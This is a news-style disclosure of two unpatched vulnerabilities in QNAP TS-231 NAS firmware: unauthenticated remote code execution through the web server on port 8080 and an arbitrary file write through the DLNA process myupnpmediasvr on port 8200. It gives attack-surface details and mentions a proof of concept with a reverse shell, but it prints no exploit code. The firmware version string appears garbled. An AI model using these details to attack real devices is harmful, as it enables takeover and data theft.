SAM’s security research team revealed two recent vulnerabilities and their potential impacts that are discovered in a specific kind of NAS device (network-attached storage that is used by both organizations and consumers) made by QNAP.
These vulnerabilities are severe as they allow for full takeover of the device from the network including access to the user’s stored data, without any prior knowledge.
The research team discovered two critical vulnerabilities in QNAP TS-231’s latest firmware (version 126.96.36.1996 – 2020/09/29).
- Web server: Allows a remote attacker with access to the webserver (default port 8080) to execute arbitrary shell commands, without prior knowledge of the web credentials.
- DLNA server: Allows a remote attacker with access to the DLNA server (default port 8200) to create arbitrary file data on any (non-existing) location, without any prior knowledge or credentials. It can also be elevated to execute arbitrary commands on the remote NAS as well.
The researchers say that these may affect other models and firmware versions as well.
Vulnerability #1 – RCE vulnerability: Affects any QNAP device exposed to the Internet
This vulnerability resides in the NAS web server (default TCP port 8080). Previous RCE attacks on QNAP NAS models relied on web pages that do not require prior authentication and run/trigger code on the server-side.
During the inspection, experts fuzzed the webserver with customized HTTP requests to different cgi pages, with a focus on those that do not require prior authentication. This triggers remote code execution indirectly (i.e., triggers some behavior in other processes).
“The vendor can fix the vulnerability by adding input sanitizations to some core processes and library APIs, but it has not been fixed”, suggested by researchers.
Vulnerability #2 – Arbitrary file write vulnerability
This vulnerability resides in the DLNA server (default TCP port 8200). The DLNA server is implemented as the process myupnpmediasvr, and handles UPNP requests on port 8200.
The research discovered this vulnerability during the investigation of the process’s behaviour and communication both externally and internally. It is capable to elevate that vulnerability to remote code execution on the remote NAS as well.
To exploit the bug, researchers created a proof-of-concept attack. “[We used] a python script that we wrote to hack into the device. We achieve a full takeover of the device by using a simple reverse shell technique. After that, we access a file that’s stored on the QNAP storage. Any file stored can be accessed similarly.”, according to researchers at SAM Seamless Network.
Both the vulnerabilities have been reported to QNAP with a 4-month grace period to fix them. Unfortunately, as of now, the vulnerabilities have not yet been fixed.